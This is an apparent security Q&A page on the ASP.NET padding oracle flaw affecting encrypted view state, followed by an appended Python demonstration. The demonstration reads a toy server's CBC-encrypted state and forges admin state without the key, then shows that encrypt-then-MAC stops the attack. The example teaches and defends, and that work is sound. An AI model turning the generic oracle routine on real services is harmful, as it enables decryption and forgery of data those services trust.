4

While reading up on view state as a possible means to prevent CSRF, I came across this Microsoft Security Bulletin which states:

An attacker who successfully exploited this vulnerability could read data, such as the view state, which was encrypted by the server.

I had always heard that encrypted view state was secure. Does anyone have any details on how this exploit works? I did some googling but didn't find any details.

Abe Miessler
  • Unless you are a few years behind on patches (in which case you have bigger worries), yes, an attacker with enough knowledge of your system may be able to get access to viewstate data and/or manipulate the same... – KristoferA Jul 29 '13 at 17:48

1 Answer

5

This is the infamous Padding Oracle vulnerability; this is the original paper describing the vulnerability in detail.

View State related exploitation would strongly depend on the actual application logic. If the state information is properly encrypted and integrity checked, the application (developer) can safely presume that the included data is trustworthy (e.g. input validation was already performed, or the data originates from the server, not the client). Without proper defense-in-depth measures in place, this can cause a situation similar to a TOCTOU conflict, resulting in a security vulnerability.

Example: PadBuster exploits the fact that the WebResource/ScriptResource handlers presume that their parameter could only properly be set by the server and didn't check for path traversal.

buherator
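The answer above names the mechanism but not how a padding oracle turns "encrypted" into "readable and forgeable". The following is an added worked example, not code from the question, the answer, PadBuster or Microsoft. It builds a CBC/PKCS#7 server whose only leak is whether padding was valid, runs the byte-at-a-time attack that recovers plaintext without the key, then uses the same oracle backwards to forge a ciphertext for chosen plaintext (the step that lets an attacker submit a "server-encrypted" parameter the handler trusts), and finally shows that an integrity check verified before decryption removes the oracle. All names (`StateServer`, `recover_intermediate`, `attack_encrypt`, `demo`) and the sample state strings are mine; the block cipher is a 4-round HMAC-SHA256 Feistel stand-in for AES so the file runs on the standard library alone, and the attack is cipher-agnostic, so it behaves identically against AES-CBC.

```python
# Added example; not ASP.NET, PadBuster or Microsoft code.  A CBC padding oracle,
# the attack that reads and forges "server-encrypted" data without the key, and
# the encrypt-then-MAC fix.  The block cipher is a 4-round HMAC-SHA256 Feistel
# stand-in for AES (assumption for portability); the attack does not depend on it.
import hashlib, hmac, secrets

BLOCK = 16
SAMPLE = b"user=alice;role=viewer"  # constructed sample state, not a real view state

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):  # Feistel round function
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_cipher(key, blk, decrypt=False):  # 4-round Feistel on a 16-byte block
    L, R = blk[:8], blk[8:]
    for rnd in (range(3, -1, -1) if decrypt else range(4)):
        L, R = (xor(R, _f(key, rnd, L)), L) if decrypt else (R, xor(L, _f(key, rnd, R)))
    return L + R

def pad(data):  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # the distinguishable failure the attack needs
    return data[:-n]

def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_cipher(key, xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ct):
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return b"".join(xor(block_cipher(key, c, decrypt=True), p) for p, c in zip(blocks, blocks[1:]))

class StateServer:
    """mac=False: encryption only, "bad padding" observable (the oracle). mac=True: encrypt-then-MAC."""
    def __init__(self, mac):
        self.key, self.mac_key, self.mac = secrets.token_bytes(32), secrets.token_bytes(32), mac
    def _tag(self, body):
        return hmac.new(self.mac_key, body, hashlib.sha256).digest() if self.mac else b""
    def protect(self, pt):
        iv = secrets.token_bytes(BLOCK)
        body = iv + cbc_encrypt(self.key, iv, pad(pt))
        return body + self._tag(body)
    def unprotect(self, blob):
        n = len(blob) - (32 if self.mac else 0)
        if not hmac.compare_digest(blob[n:], self._tag(blob[:n])):
            raise ValueError("bad MAC")  # uniform rejection before decryption; padding never examined
        return unpad(cbc_decrypt(self.key, blob[:BLOCK], blob[BLOCK:n]))
    def padding_ok(self, blob):  # all the attacker observes: one bit per request
        try:
            self.unprotect(blob)
            return True
        except ValueError:
            return False

def recover_intermediate(oracle, target):
    """Recover D_k(target) byte by byte, last byte first, from the padding bit alone."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos  # bytes pos..15 must all decrypt to this value
        for guess in range(256):
            forged = bytes(pos) + bytes([guess]) + bytes(b ^ padval for b in inter[pos + 1:])
            if not oracle(forged + target):
                continue
            if pos == BLOCK - 1 and not oracle(xor(forged, bytes(pos - 1) + b"\xff\0") + target):
                continue  # last byte: a hit can be a longer pad (e.g. 02 02); flipping byte 14 exposes it
            inter[pos] = guess ^ padval
            break
        else:
            raise RuntimeError("no padding oracle here")
    return bytes(inter)

def attack_decrypt(oracle, blob):  # "read data ... which was encrypted by the server"
    blocks = [blob[i:i + BLOCK] for i in range(0, len(blob), BLOCK)]
    return unpad(b"".join(xor(recover_intermediate(oracle, c), p) for p, c in zip(blocks, blocks[1:])))

def attack_encrypt(oracle, pt):  # forge a ciphertext for chosen plaintext, built back to front
    padded, out = pad(pt), [secrets.token_bytes(BLOCK)]  # any last block will do
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        out.append(xor(recover_intermediate(oracle, out[-1]), padded[i:i + BLOCK]))
    return b"".join(reversed(out))  # iv || c1 || ... || cn

def demo():
    weak, hard = StateServer(mac=False), StateServer(mac=True)
    results = {"read": attack_decrypt(weak.padding_ok, weak.protect(SAMPLE)),
               "forged": weak.unprotect(attack_encrypt(weak.padding_ok, b"user=alice;role=admin"))}
    try:  # with the MAC every tampered query is "no", so the attack never finds a byte
        attack_decrypt(hard.padding_ok, hard.protect(SAMPLE))
        results["hardened_resists"] = False
    except RuntimeError:
        results["hardened_resists"] = True
    return results
```

Run `demo()`: against the MAC-less server it returns the original state under `"read"` and `b"user=alice;role=admin"` under `"forged"`, meaning the server accepted and decrypted a ciphertext the attacker built without the key; against the encrypt-then-MAC server the attack aborts and `"hardened_resists"` is `True`. In a real deployment the oracle is rarely a clean boolean: it is a distinct HTTP status, error page or timing difference, which is why the fix is to verify the MAC (with a constant-time compare, before any decryption or padding check) and to return one uniform failure for every rejected input. That is what "properly encrypted and integrity checked" in the answer has to mean in practice.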